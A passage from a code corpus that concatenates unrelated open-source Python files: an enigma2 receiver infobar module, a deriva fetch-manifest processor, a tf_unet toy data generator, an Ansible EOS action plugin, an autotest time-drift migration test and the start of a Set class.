self.subtitle_window = InfoBar.instance.subtitle_window
self.subtitle_window.hide()
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evStart: self.__serviceChanged,
iPlayableService.evEnd: self.__serviceChanged,
iPlayableService.evUpdatedInfo: self.__updatedInfo
})
def getCurrentServiceSubtitle(self):
service = self.session.nav.getCurrentService()
return service and service.subtitle()
def subtitleSelection(self):
service = self.session.nav.getCurrentService()
subtitle = service and service.subtitle()
subtitlelist = subtitle and subtitle.getSubtitleList()
if self.selected_subtitle or subtitlelist and len(subtitlelist)>0:
from Screens.AudioSelection import SubtitleSelection
self.session.open(SubtitleSelection, self)
else:
return 0
def doCenterDVBSubs(self):
service = self.session.nav.getCurrentlyPlayingServiceReference()
servicepath = service and service.getPath()
if servicepath and servicepath.startswith("/"):
if service.toString().startswith("1:"):
info = eServiceCenter.getInstance().info(service)
service = info and info.getInfoString(service, iServiceInformation.sServiceref)
config.subtitles.dvb_subtitles_centered.value = service and eDVBDB.getInstance().getFlag(eServiceReference(service)) & self.FLAG_CENTER_DVB_SUBS and True
return
service = self.session.nav.getCurrentService()
info = service and service.info()
config.subtitles.dvb_subtitles_centered.value = info and info.getInfo(iServiceInformation.sCenterDVBSubs) and True
def __serviceChanged(self):
if self.selected_subtitle:
self.selected_subtitle = None
self.subtitle_window.hide()
def __updatedInfo(self):
if not self.selected_subtitle:
subtitle = self.getCurrentServiceSubtitle()
cachedsubtitle = subtitle.getCachedSubtitle()
if cachedsubtitle:
self.enableSubtitle(cachedsubtitle)
self.doCenterDVBSubs()
def enableSubtitle(self, selectedSubtitle):
subtitle = self.getCurrentServiceSubtitle()
self.selected_subtitle = selectedSubtitle
if subtitle and self.selected_subtitle:
subtitle.enableSubtitles(self.subtitle_window.instance, self.selected_subtitle)
self.subtitle_window.show()
self.doCenterDVBSubs()
else:
if subtitle:
subtitle.disableSubtitles(self.subtitle_window.instance)
self.subtitle_window.hide()
def restartSubtitle(self):
if self.selected_subtitle:
self.enableSubtitle(self.selected_subtitle)
class InfoBarServiceErrorPopupSupport:
def __init__(self):
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evTuneFailed: self.__tuneFailed,
iPlayableService.evTunedIn: self.__serviceStarted,
iPlayableService.evStart: self.__serviceStarted
})
self.__serviceStarted()
def __serviceStarted(self):
self.closeNotificationInstantiateDialog()
self.last_error = None
Notifications.RemovePopup(id = "ZapError")
def __tuneFailed(self):
if not config.usage.hide_zap_errors.value or not config.usage.remote_fallback_enabled.value:
service = self.session.nav.getCurrentService()
info = service and service.info()
error = info and info.getInfo(iServiceInformation.sDVBState)
if not config.usage.remote_fallback_enabled.value and (error == eDVBServicePMTHandler.eventMisconfiguration or error == eDVBServicePMTHandler.eventNoResources):
self.session.nav.currentlyPlayingServiceReference = None
self.session.nav.currentlyPlayingServiceOrGroup = None
if error == self.last_error:
error = None
else:
self.last_error = error
error = {
eDVBServicePMTHandler.eventNoResources: _("No free tuner!"),
eDVBServicePMTHandler.eventTuneFailed: _("Tune failed!"),
eDVBServicePMTHandler.eventNoPAT: _("No data on transponder!\n(Timeout reading PAT)"),
eDVBServicePMTHandler.eventNoPATEntry: _("Service not found!\n(SID not found in PAT)"),
eDVBServicePMTHandler.eventNoPMT: _("Service invalid!\n(Timeout reading PMT)"),
eDVBServicePMTHandler.eventNewProgramInfo: None,
eDVBServicePMTHandler.eventTuned: None,
eDVBServicePMTHandler.eventSOF: None,
eDVBServicePMTHandler.eventEOF: None,
eDVBServicePMTHandler.eventMisconfiguration: _("Service unavailable!\nCheck tuner configuration!"),
				}.get(error) # .get() returns None when the key does not exist in the dict
if error and not config.usage.hide_zap_errors.value:
self.closeNotificationInstantiateDialog()
if hasattr(self, "dishDialog") and not self.dishDialog.dishState():
Notifications.AddPopup(text = error, type = MessageBox.TYPE_ERROR, timeout = 5, id = "ZapError")
class InfoBarZoom:
def __init__(self):
self.zoomrate=0
self.zoomin=1
self["ZoomActions"] = HelpableActionMap(self, "InfobarZoomActions",
{
"ZoomInOut":(self.ZoomInOut, _("Zoom In/Out TV...")),
"ZoomOff":(self.ZoomOff, _("Zoom Off...")),
}, prio=2)
def ZoomInOut(self):
zoomval=0
if self.zoomrate > 3:
self.zoomin = 0
elif self.zoomrate < -9:
self.zoomin = 1
if self.zoomin == 1:
self.zoomrate += 1
else:
self.zoomrate -= 1
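		# assumption: the vmpeg zoomrate proc interface encodes zoom-out levels as 10 + |rate|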
if self.zoomrate < 0:
zoomval=abs(self.zoomrate)+10
else:
zoomval=self.zoomrate
# print "zoomRate:", self.zoomrate
# print "zoomval:", zoomval
file = open("/proc/stb/vmpeg/0/zoomrate", "w")
file.write('%d' % int(zoomval))
file.close()
def ZoomOff(self):
self.zoomrate = 0
self.zoomin = 1
f = open("/proc/stb/vmpeg/0/zoomrate", "w")
f.write(str(0))
f.close()
class InfoBarHdmi:
def __init__(self):
self.hdmi_enabled = False
self.hdmi_enabled_full = False
self.hdmi_enabled_pip = False
if getMachineBuild() in ('inihdp', 'hd2400', 'dm7080', 'dm820', 'dm900', 'dm920', 'gb7252', 'vuultimo4k','et13000','sf5008'):
if not self.hdmi_enabled_full:
self.addExtension((self.getHDMIInFullScreen, self.HDMIInFull, lambda: True), "blue")
if not self.hdmi_enabled_pip:
self.addExtension((self.getHDMIInPiPScreen, self.HDMIInPiP, lambda: True), "green")
self["HDMIActions"] = HelpableActionMap(self, "InfobarHDMIActions",
{
"HDMIin":(self.HDMIIn, _("Switch to HDMI in mode")),
"HDMIinLong":(self.HDMIInLong, _("Switch to HDMI in mode")),
}, prio=2)
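	# service reference type 8192 is used here to address the HDMI-IN input on supported receivers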
def HDMIInLong(self):
if self.LongButtonPressed:
if not hasattr(self.session, 'pip') and not self.session.pipshown:
self.session.pip = self.session.instantiateDialog(PictureInPicture)
self.session.pip.playService(eServiceReference('8192:0:1:0:0:0:0:0:0:0:'))
self.session.pip.show()
self.session.pipshown = True
self.session.pip.servicePath = self.servicelist.getCurrentServicePath()
else:
curref = self.session.pip.getCurrentService()
if curref and curref.type != 8192:
self.session.pip.playService(eServiceReference('8192:0:1:0:0:0:0:0:0:0:'))
self.session.pip.servicePath = self.servicelist.getCurrentServicePath()
else:
self.session.pipshown = False
del self.session.pip
def HDMIIn(self):
if not self.LongButtonPressed:
slist = self.servicelist
curref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if curref and curref.type != 8192:
self.session.nav.playService(eServiceReference('8192:0:1:0:0:0:0:0:0:0:'))
else:
self.session.nav.playService(slist.servicelist.getCurrent())
def getHDMIInFullScreen(self):
if not self.hdmi_enabled_full:
return _("Turn on HDMI-IN Full screen mode")
else:
return _("Turn off HDMI-IN Full screen mode")
def getHDMIInPiPScreen(self):
if not self.hdmi_enabled_pip:
return _("Turn on HDMI-IN PiP mode")
else:
return _("Turn off HDMI-IN PiP mode")
def HDMIInPiP(self):
if getMachineBuild() in ('dm7080', 'dm820', 'dm900', 'dm920'):
f=open("/proc/stb/hdmi-rx/0/hdmi_rx_monitor","r")
check=f.read()
f.close()
if check.startswith("off"):
f=open("/proc/stb/audio/hdmi_rx_monitor","w")
f.write("on")
f.close()
f=open("/proc/stb/hdmi-rx/0/hdmi_rx_monitor","w")
f.write("on")
f.close()
else:
f=open("/proc/stb/audio/hdmi_rx_monitor","w")
f.write("off")
f.close()
f=open("/proc/stb/hdmi-rx/0/hdmi_rx_monitor","w")
f.write("off")
f.close()
else:
if not hasattr(self.session, 'pip') and not self.session.pipshown:
self.hdmi_enabled_pip = True
self.session.pip = self.session.instantiateDialog(PictureInPicture)
self.session.pip.playService(eServiceReference('8192:0:1:0:0:0:0:0:0:0:'))
self.session.pip.show()
self.session.pipshown = True
self.session.pip.servicePath = self.servicelist.getCurrentServicePath()
else:
curref = self.session.pip.getCurrentService()
if curref and curref.type != 8192:
self.hdmi_enabled_pip = True
self.session.pip.playService(eServiceReference('8192:0:1:0:0:0:0:0:0:0:'))
self.session.pip.servicePath = self.servicelist.getCurrentServicePath()
else:
self.hdmi_enabled_pip = False
self.session.pipshown = False
del self.session.pip
def HDMIInFull(self):
if getMachineBuild() in ('dm7080', 'dm820', 'dm900', 'dm920'):
f=open("/proc/stb/hdmi-rx/0/hdmi_rx_monitor","r")
check=f.read()
f.close()
if check.startswith("off"):
f=open("/proc/stb/video/videomode","r")
self.oldvideomode=f.read()
f.close()
f=open("/proc/stb/video/videomode_50hz","r")
self.oldvideomode_50hz=f.read()
f.close()
f=open("/proc/stb/video/videomode_60hz","r")
self.oldvideomode_60hz=f.read()
f.close()
f=open("/proc/stb/video/videomode","w")
if getMachineBuild() in ('dm900', 'dm920'):
f.write("1080p")
else:
f.write("720p")
f.close()
f=open("/proc/stb/audio/hdmi_rx_monitor","w")
f.write("on")
f.close()
f=open("/proc/stb/hdmi-rx/0/hdmi_rx_monitor","w")
f.write("on")
f.close()
else:
f=open("/proc/stb/audio/hdmi_rx_monitor","w")
f.write("off")
f.close()
f=open("/proc/stb/hdmi-rx/0/hdmi_rx_monitor","w")
f.write("off")
f.close()
f=open("/proc/stb/video/videomode","w")
f.write(self.oldvideomode)
f.close()
f=open("/proc/stb/video/videomode_50hz","w")
f.write(self.oldvideomode_50hz)
f.close()
f=open("/proc/stb/video/videomode_60hz","w")
f.write(self.oldvideomode_60hz)
f.close()
else:
slist = self.servicelist
curref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if curref and curref.type != 8192:
self.hdmi_enabled_full = True
self.session.nav.playService(eServiceReference('8192:0:1:0:0:0:0:0:0:0:'))
else:
self.hdmi_enabled_full = False
self.session.nav.playService(slist.servicelist.getCurrent())
class InfoBarSleepTimer:
def __init__(self):
self.sleepTimer = eTimer()
self.sleepStartTime = 0
self.sleepTimer.callback.append(self.sleepTimerTimeout)
def sleepTimerState(self):
if self.sleepTimer.isActive():
return (self.sleepStartTime - time()) / 60
return 0
def setSleepTimer(self, sleepTime, showMessage = True):
print "[InfoBarSleepTimer] set sleeptimer", sleepTime
if sleepTime:
m = abs(sleepTime / 60)
message = _("The sleep timer has been activated.") + "\n" + _("Delay:") + " " + _("%d minutes") % m
self.sleepTimer.startLongTimer(sleepTime)
self.sleepStartTime = time() + sleepTime
else:
message = _("The sleep timer has been disabled.")
self.sleepTimer.stop()
if showMessage:
Notifications.AddPopup(message, type = MessageBox.TYPE_INFO, timeout = 5)
def sleepTimerTimeout(self):
if config.usage.sleep_timer_action.value != "standby":
isRecordTime = abs(self.session.nav.RecordTimer.getNextRecordingTime() - time()) <= 900 or self.session.nav.RecordTimer.getStillRecording() or abs(self.session.nav.RecordTimer.getNextZapTime() - time()) <= 900
isPowerTime = abs(self.session.nav.PowerTimer.getNextPowerManagerTime() - time()) <= 900 or self.session.nav.PowerTimer.isProcessing(exceptTimer = 0)
if isRecordTime or isPowerTime:
self.setSleepTimer(1800, False)
if not Screens.Standby.inStandby:
message = _("A Recording, RecordTimer or PowerTimer is running or begins in 15 minutes.\nExtend sleep timer 30 minutes. Your %s %s\nwill shut down after Recording or Powertimer event. Get in Standby now?") % (getMachineBrand(), getMachineName())
self.session.openWithCallback(self.goStandby, MessageBox, message, MessageBox.TYPE_YESNO, timeout=180, default=True)
return
if not Screens.Standby.inStandby:
list = [ (_("Yes"), True),
(_("No"), False),
(_("Extend"), "extend") ]
if config.usage.sleep_timer_action.value == "standby":
message = _("A sleep timer wants to set your %s %s to standby.\nDo that now or set extend additional minutes?") % (getMachineBrand(), getMachineName())
else:
message = _("A sleep timer wants to shut down your %s %s.\nDo that now or set extend additional minutes?") % (getMachineBrand(), getMachineName())
self.session.openWithCallback(self.sleepTimerTimeoutCallback, MessageBox, message, timeout=180, simple=True, list=list, default=True)
else:
self.goStandby()
def sleepTimerTimeoutCallback(self, answer):
if answer == "extend":
from Screens.SleepTimerEdit import SleepTimerEdit
self.session.open(SleepTimerEdit)
elif answer:
self.goStandby()
else:
self.setSleepTimer(0)
def goStandby(self, answer = None):
if config.usage.sleep_timer_action.value == "standby" or answer:
if not Screens.Standby.inStandby:
print "[InfoBarSleepTimer] goto standby"
self.session.open(Screens.Standby.Standby)
elif answer is None:
if not Screens.Standby.inStandby:
if not Screens.Standby.inTryQuitMainloop:
print "[InfoBarSleepTimer] goto deep standby"
self.session.open(Screens.Standby.TryQuitMainloop, 1)
else:
print "[InfoBarSleepTimer] goto deep standby"
quitMainloop(1)
#########################################################################################
# for displayed power or record timer messages in foreground and for callback execution #
#########################################################################################
class InfoBarOpenOnTopHelper:
def __init__(self):
pass
def openInfoBarMessage(self, message, messageboxtyp, timeout=-1):
try:
self.session.open(MessageBox, message, messageboxtyp, timeout=timeout)
except Exception, e:
print "[InfoBarOpenMessage] Exception:", e
def openInfoBarMessageWithCallback(self, callback, message, messageboxtyp, timeout=-1, default=True):
try:
self.session.openWithCallback(callback, MessageBox, message, messageboxtyp, timeout=timeout, default=default)
except Exception, e:
print "[openInfoBarMessageWithCallback] Exception:", e
def openInfoBarSession(self, session, option=None):
try:
if option is None:
self.session.open(session)
else:
self.session.open(session, option)
except Exception, e:
print "[openInfoBarSession] Exception:", e
#########################################################################################
| formiano/enigma2 | lib/python/Screens/InfoBarGenerics.py | Python | gpl-2.0 | 185,032 |
import os
import json
import uuid
import logging
import requests
from bdbag import bdbag_ro as ro
from deriva.core import format_exception
from deriva.core.utils.hash_utils import decodeBase64toHex
from deriva.core.utils.mime_utils import parse_content_disposition
from deriva.transfer.download.processors.query.base_query_processor import BaseQueryProcessor, LOCAL_PATH_KEY
from deriva.transfer.download import DerivaDownloadError, DerivaDownloadConfigurationError
class BagFetchQueryProcessor(BaseQueryProcessor):
def __init__(self, envars=None, **kwargs):
super(BagFetchQueryProcessor, self).__init__(envars, **kwargs)
self.content_type = "application/x-json-stream"
filename = ''.join(['fetch-manifest_', str(uuid.uuid4()), ".json"])
self.output_relpath, self.output_abspath = self.create_paths(self.base_path, filename=filename)
self.ro_file_provenance = False
def process(self):
super(BagFetchQueryProcessor, self).process()
rfm_relpath, rfm_abspath = self.createRemoteFileManifest()
if rfm_relpath and rfm_abspath:
self.outputs.update({rfm_relpath: {LOCAL_PATH_KEY: rfm_abspath}} if not self.is_bag else {})
return self.outputs
def createRemoteFileManifest(self):
logging.info("Creating remote file manifest from results of query: %s" % self.query)
input_manifest = self.output_abspath
remote_file_manifest = self.kwargs.get("remote_file_manifest")
if not os.path.isfile(input_manifest):
return None, None
with open(input_manifest, "r", encoding="utf-8") as in_file, \
open(remote_file_manifest, "a", encoding="utf-8") as remote_file:
for line in in_file:
# get the required bdbag remote file manifest vars from each line of the json-stream input file
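                # illustrative input line (field names assumed from the .get() calls in createManifestEntry):
                # {"url": "https://host/f.txt", "length": 1024, "md5": "...", "sha256": "...", "filename": "data/f.txt", "content_type": "text/plain"}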
entry = json.loads(line)
entry = self.createManifestEntry(entry)
if not entry:
continue
remote_file.write(json.dumps(entry) + "\n")
if self.ro_manifest:
ro.add_file_metadata(self.ro_manifest,
source_url=entry["url"],
media_type=entry.get("content_type"),
bundled_as=ro.make_bundled_as(
folder=os.path.dirname(entry["filename"]),
filename=os.path.basename(entry["filename"])))
os.remove(input_manifest)
return os.path.relpath(remote_file_manifest, self.base_path), os.path.abspath(remote_file_manifest)
def createManifestEntry(self, entry):
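        # builds one bdbag remote-file-manifest entry; a sketch of the output shape, based on
        # the keys set below: {"url", "length", "filename"} plus "md5"/"sha256"/"content_type" when known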
manifest_entry = dict()
url = entry.get("url")
if not url:
logging.warning(
"Skipping a record due to missing required attribute \"url\" in fetch manifest entry %s" %
json.dumps(entry))
return
ext_url = self.getExternalUrl(url)
length = entry.get("length")
md5 = entry.get("md5")
sha256 = entry.get("sha256")
filename = entry.get("filename") if not self.output_filename else self.output_filename
content_type = entry.get("content_type")
content_disposition = None
# if any required fields are missing from the query result, attempt to get them from the remote server by
# issuing a HEAD request against the supplied URL
if not (length and (md5 or sha256)):
try:
headers = self.headForHeaders(url, raise_for_status=True)
except requests.HTTPError as e:
raise DerivaDownloadError("Exception during HEAD request: %s" % format_exception(e))
length = headers.get("Content-Length")
content_type = headers.get("Content-Type")
content_disposition = headers.get("Content-Disposition")
if not md5:
md5 = headers.get("Content-MD5")
if md5:
md5 = decodeBase64toHex(md5)
if not sha256:
sha256 = headers.get("Content-SHA256")
if sha256:
sha256 = decodeBase64toHex(sha256)
# if content length or both hash values are missing, it is a fatal error
if length is None:
raise DerivaDownloadError("Could not determine Content-Length for %s" % ext_url)
if not (md5 or sha256):
raise DerivaDownloadError("Could not locate an MD5 or SHA256 hash for %s" % ext_url)
# if a local filename is not provided, try to construct one using content_disposition, if available
if not filename:
filename = os.path.basename(url).split(":")[0] if not content_disposition else \
parse_content_disposition(content_disposition)
env = self.envars.copy()
env.update(entry)
output_path, _ = self.create_paths(self.base_path,
sub_path=self.sub_path,
filename=filename,
is_bag=self.is_bag,
envars=env)
manifest_entry['url'] = ext_url
manifest_entry['length'] = int(length)
manifest_entry['filename'] = output_path
if md5:
manifest_entry['md5'] = md5
if sha256:
manifest_entry['sha256'] = sha256
if content_type:
manifest_entry["content_type"] = content_type
return manifest_entry
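# Illustrative only: each line written to the bdbag remote-file-manifest above
# is a JSON object shaped like the dict below (keys mirror createManifestEntry;
# the URL, size and hash values are hypothetical):
#
#   {"url": "https://example.org/hatrac/ns/file.txt",
#    "length": 1024,
#    "filename": "data/file.txt",
#    "md5": "9e107d9d372bb6826bd81d3542a419d6",
#    "content_type": "text/plain"}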
| informatics-isi-edu/deriva-py | deriva/transfer/download/processors/query/bag_fetch_query_processor.py | Python | apache-2.0 | 5,645 |
# tf_unet is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# tf_unet is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with tf_unet. If not, see <http://www.gnu.org/licenses/>.
'''
Toy example, generates images at random that can be used for training
Created on Jul 28, 2016
author: jakeret
'''
from __future__ import print_function, division, absolute_import, unicode_literals
import numpy as np
from tf_unet.image_util import BaseDataProvider
class GrayScaleDataProvider(BaseDataProvider):
channels = 1
n_class = 1
def __init__(self, nx, ny, **kwargs):
super(GrayScaleDataProvider, self).__init__()
self.nx = nx
self.ny = ny
self.kwargs = kwargs
rect = kwargs.get("rectangles", False)
if rect:
self.n_class=3
def _next_data(self):
image, label = create_image_and_label(self.nx, self.ny, **self.kwargs)
# print(image.shape)
# print(label.shape)
return image,label
# return create_image_and_label(self.nx, self.ny, **self.kwargs)
class RgbDataProvider(BaseDataProvider):
channels = 3
n_class = 2
def __init__(self, nx, ny, **kwargs):
super(RgbDataProvider, self).__init__()
self.nx = nx
self.ny = ny
self.kwargs = kwargs
rect = kwargs.get("rectangles", False)
if rect:
self.n_class=3
def _next_data(self):
data, label = create_image_and_label(self.nx, self.ny, **self.kwargs)
return to_rgb(data), label
def create_image_and_label(nx,ny, cnt = 2, r_min = 2, r_max = 8, border = 0, sigma = 1, rectangles=False):
image = np.ones((nx, ny, 1))
label = np.zeros((nx, ny, 3), dtype=np.float32)
mask = np.zeros((nx, ny), dtype=np.bool)
for _ in range(cnt):
a = np.random.randint(border, nx-border)
b = np.random.randint(border, ny-border)
r = np.random.randint(r_min, r_max)
h = np.random.randint(1,255)
y,x = np.ogrid[-a:nx-a, -b:ny-b]
m = x*x + y*y <= r*r
mask = np.logical_or(mask, m)
image[m] = h
# print(mask.shape)
label[mask, 1] = 1
if rectangles:
mask = np.zeros((nx, ny), dtype=np.bool)
for _ in range(cnt//2):
a = np.random.randint(nx)
b = np.random.randint(ny)
r = np.random.randint(r_min, r_max)
h = np.random.randint(1,255)
m = np.zeros((nx, ny), dtype=np.bool)
m[a:a+r, b:b+r] = True
mask = np.logical_or(mask, m)
image[m] = h
label[mask, 2] = 1
label[..., 0] = ~(np.logical_or(label[...,1], label[...,2]))
image += np.random.normal(scale=sigma, size=image.shape)
image -= np.amin(image)
image /= np.amax(image)
if rectangles:
return image, label
else:
return image, label[..., 1]
def to_rgb(img):
img = img.reshape(img.shape[0], img.shape[1])
img[np.isnan(img)] = 0
img -= np.amin(img)
img /= np.amax(img)
blue = np.clip(4*(0.75-img), 0, 1)
red = np.clip(4*(img-0.25), 0, 1)
green= np.clip(44*np.fabs(img-0.5)-1., 0, 1)
rgb = np.stack((red, green, blue), axis=2)
return rgb
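# Minimal usage sketch, assuming BaseDataProvider implements __call__(n) to
# draw a batch (as in upstream tf_unet); illustrative, not canonical:
#
#   generator = GrayScaleDataProvider(nx=172, ny=172, cnt=20)
#   x_batch, y_batch = generator(4)  # 4 noisy images plus matching label masks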
| mughanibu/Deep-Learning-for-Inverse-Problems | tf_unet/image_gen.py | Python | mit | 3,652 |
#
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import sys
import copy
from ansible.plugins.action.normal import ActionModule as _ActionModule
from ansible.utils.path import unfrackpath
from ansible.plugins import connection_loader
from ansible.compat.six import iteritems
from ansible.module_utils.eos import ARGS_DEFAULT_VALUE, eos_argument_spec
from ansible.module_utils.basic import AnsibleFallbackNotFound
from ansible.module_utils._text import to_bytes
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
class ActionModule(_ActionModule):
def run(self, tmp=None, task_vars=None):
if self._play_context.connection != 'local':
return dict(
failed=True,
msg='invalid connection specified, expected connection=local, '
'got %s' % self._play_context.connection
)
provider = self.load_provider()
transport = provider['transport'] or 'cli'
display.vvvv('connection transport is %s' % transport, self._play_context.remote_addr)
if transport == 'cli':
pc = copy.deepcopy(self._play_context)
pc.connection = 'network_cli'
pc.network_os = 'eos'
pc.remote_addr = provider['host'] or self._play_context.remote_addr
pc.port = provider['port'] or self._play_context.port or 22
pc.remote_user = provider['username'] or self._play_context.connection_user
pc.password = provider['password'] or self._play_context.password
pc.private_key_file = provider['ssh_keyfile'] or self._play_context.private_key_file
pc.timeout = provider['timeout'] or self._play_context.timeout
pc.become = provider['authorize'] or False
pc.become_pass = provider['auth_pass']
display.vvv('using connection plugin %s' % pc.connection, pc.remote_addr)
connection = self._shared_loader_obj.connection_loader.get('persistent', pc, sys.stdin)
socket_path = self._get_socket_path(pc)
display.vvvv('socket_path: %s' % socket_path, pc.remote_addr)
if not os.path.exists(socket_path):
# start the connection if it isn't started
rc, out, err = connection.exec_command('open_shell()')
display.vvvv('open_shell() returned %s %s %s' % (rc, out, err))
if not rc == 0:
return {'failed': True,
'msg': 'unable to open shell. Please see: ' +
'https://docs.ansible.com/ansible/network_debug_troubleshooting.html#unable-to-open-shell'}
else:
# make sure we are in the right cli context which should be
# enable mode and not config module
rc, out, err = connection.exec_command('prompt()')
while str(out).strip().endswith(')#'):
display.vvvv('wrong context, sending exit to device', self._play_context.remote_addr)
connection.exec_command('exit')
rc, out, err = connection.exec_command('prompt()')
task_vars['ansible_socket'] = socket_path
else:
provider['transport'] = 'eapi'
if provider.get('host') is None:
provider['host'] = self._play_context.remote_addr
if provider.get('use_ssl') is None:
provider['use_ssl'] = ARGS_DEFAULT_VALUE['use_ssl']
if provider.get('port') is None:
default_port = 443 if provider['use_ssl'] else 80
provider['port'] = self._play_context.port or default_port
if provider.get('timeout') is None:
provider['timeout'] = self._play_context.timeout
if provider.get('username') is None:
provider['username'] = self._play_context.connection_user
if provider.get('password') is None:
provider['password'] = self._play_context.password
if provider.get('authorize') is None:
provider['authorize'] = False
if provider.get('validate_certs') is None:
provider['validate_certs'] = ARGS_DEFAULT_VALUE['validate_certs']
self._task.args['provider'] = provider
result = super(ActionModule, self).run(tmp, task_vars)
return result
def _get_socket_path(self, play_context):
ssh = connection_loader.get('ssh', class_only=True)
cp = ssh._create_control_path(play_context.remote_addr, play_context.port, play_context.remote_user)
path = unfrackpath("$HOME/.ansible/pc")
return cp % dict(directory=path)
def load_provider(self):
provider = self._task.args.get('provider', {})
for key, value in iteritems(eos_argument_spec):
if key != 'provider' and key not in provider:
if key in self._task.args:
provider[key] = self._task.args[key]
elif 'fallback' in value:
provider[key] = self._fallback(value['fallback'])
elif key not in provider:
provider[key] = None
return provider
def _fallback(self, fallback):
strategy = fallback[0]
args = []
kwargs = {}
for item in fallback[1:]:
if isinstance(item, dict):
kwargs = item
else:
args = item
try:
return strategy(*args, **kwargs)
except AnsibleFallbackNotFound:
pass
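# Illustrative task-level provider dict this plugin consumes (keys come from
# eos_argument_spec; the host and credentials below are placeholders):
#
#   provider:
#     host: 192.0.2.10
#     username: admin
#     password: secret
#     transport: cli    # or "eapi" to take the HTTP(S) API branch above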
| Inspq/ansible | lib/ansible/plugins/action/eos.py | Python | gpl-3.0 | 6,406 |
import logging
import time
from autotest.client.shared import error, utils
from virttest import utils_test
from autotest.client.shared.syncdata import SyncData
@error.context_aware
def run(test, params, env):
"""
KVM multi-host migration test:
Migration execution progress is described in documentation
for migrate method in class MultihostMigration.
:param test: kvm test object.
:param params: Dictionary with test parameters.
:param env: Dictionary with the test environment.
"""
mig_protocol = params.get("mig_protocol", "tcp")
base_class = utils_test.qemu.MultihostMigration
if mig_protocol == "fd":
base_class = utils_test.qemu.MultihostMigrationFd
if mig_protocol == "exec":
base_class = utils_test.qemu.MultihostMigrationExec
if "rdma" in mig_protocol:
base_class = utils_test.qemu.MultihostMigrationRdma
class TestMultihostMigration(base_class):
def __init__(self, test, params, env):
super(TestMultihostMigration, self).__init__(test, params, env)
self.srchost = self.params.get("hosts")[0]
self.dsthost = self.params.get("hosts")[1]
self.vms = params["vms"].split()
self.migrate_count = int(params.get("migrate_count", "1"))
self.migration_timeout = int(params.get("migrate_timeout", "240"))
self.time_command = params["time_command"]
self.time_filter_re = params["time_filter_re"]
self.time_format = params["time_format"]
self.create_file = params["create_file"]
self.diff_limit = float(params.get("time_diff_limit", "0.1"))
self.start_ht = {}
self.start_gt = {}
self.diff_ht = {}
self.diff_gt = {}
self.id = {'src': self.srchost,
'dst': self.dsthost,
"type": "timedrift"}
self.sync = SyncData(self.master_id(), self.hostid, self.hosts,
self.id, self.sync_server)
def check_diff(self, mig_data):
logging.debug("Sleep 10s")
time.sleep(10)
time_drifted = False
for vm in mig_data.vms:
session = vm.wait_for_login()
(ht, gt) = utils_test.get_time(session, self.time_command,
self.time_filter_re,
self.time_format)
session.cmd(self.create_file)
if vm.name not in self.start_ht.keys():
(self.start_ht[vm.name], self.start_gt[vm.name]) = (ht, gt)
if abs(ht - gt) > self.diff_limit:
logging.warning("Host and %s time diff %s is greater "
"than time_diff_limit:%s" %
(vm.name, abs(ht - gt),
self.diff_limit))
logging.warning("Host time:%s Guest %s time:%s" %
(ht, vm.name, gt))
else:
self.diff_ht[vm.name] = ht - self.start_ht[vm.name]
self.diff_gt[vm.name] = gt - self.start_gt[vm.name]
gh_diff = self.diff_ht[vm.name] - self.diff_gt[vm.name]
if gh_diff > self.diff_limit:
time_drifted = True
if time_drifted:
difs = ""
for vm in mig_data.vms:
difs += ("\n VM=%s HOST=%ss GUEST=%ss"
" DIFF=%s" %
(vm.name, self.diff_ht[vm.name],
self.diff_gt[vm.name],
(self.diff_ht[vm.name] -
self.diff_gt[vm.name])))
raise error.TestError("Time DIFFERENCE for VM is greater than"
" LIMIT:%ss.%s\n" % (self.diff_limit,
difs))
def before_migration(self, mig_data):
"""
Sync time values
"""
data = self.sync.sync((self.start_ht, self.start_gt), timeout=120)
(self.start_ht, self.start_gt) = data[self.srchost]
def ping_pong_migrate(self):
for _ in range(self.migrate_count):
logging.info("File transfer not ended, starting"
" a round of migration...")
self.sync.sync(True, timeout=self.migration_timeout)
self.migrate_wait(self.vms, self.srchost, self.dsthost,
start_work=self.check_diff,
check_work=self.check_diff)
tmp = self.dsthost
self.dsthost = self.srchost
self.srchost = tmp
def migration_scenario(self, worker=None):
error.context("Migration from %s to %s over protocol %s." %
(self.srchost, self.dsthost, mig_protocol),
logging.info)
self.ping_pong_migrate()
sync_cmd = params.get("host_sync_time_cmd", "ntpdate -b pool.ntp.org")
utils.run(sync_cmd, 20)
mig = TestMultihostMigration(test, params, env)
mig.run()
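# Sketch of the cartesian params this test expects (names taken from the code
# above; the concrete values are made up for illustration):
#
#   hosts = ['host1.example', 'host2.example']   # source and destination
#   migrate_count = 3
#   time_command = 'date +%s'                    # plus matching filter/format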
| uni-peter-zheng/tp-qemu | qemu/tests/migration_multi_host_timedrift.py | Python | gpl-2.0 | 5,402 |
from copy import copy, deepcopy
from object import Object
class CantBeFrozenException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class ElemSizeException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class UnmatchedPropertiesException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class Set(object):
def __init__(self):
self.elems = list()
self.prps = dict()
self.extend_prps = dict()
self.elem_prp_keys = list()
self.elem_extend_prps = dict()
self.elem_degree = 0
def first_set(self, num_elems, elem_degree):
self.elems = list()
self.prps = dict()
self.extend_prps = dict()
self.elem_prp_keys = list()
self.elem_extend_prps = dict()
for elem_i in range(num_elems):
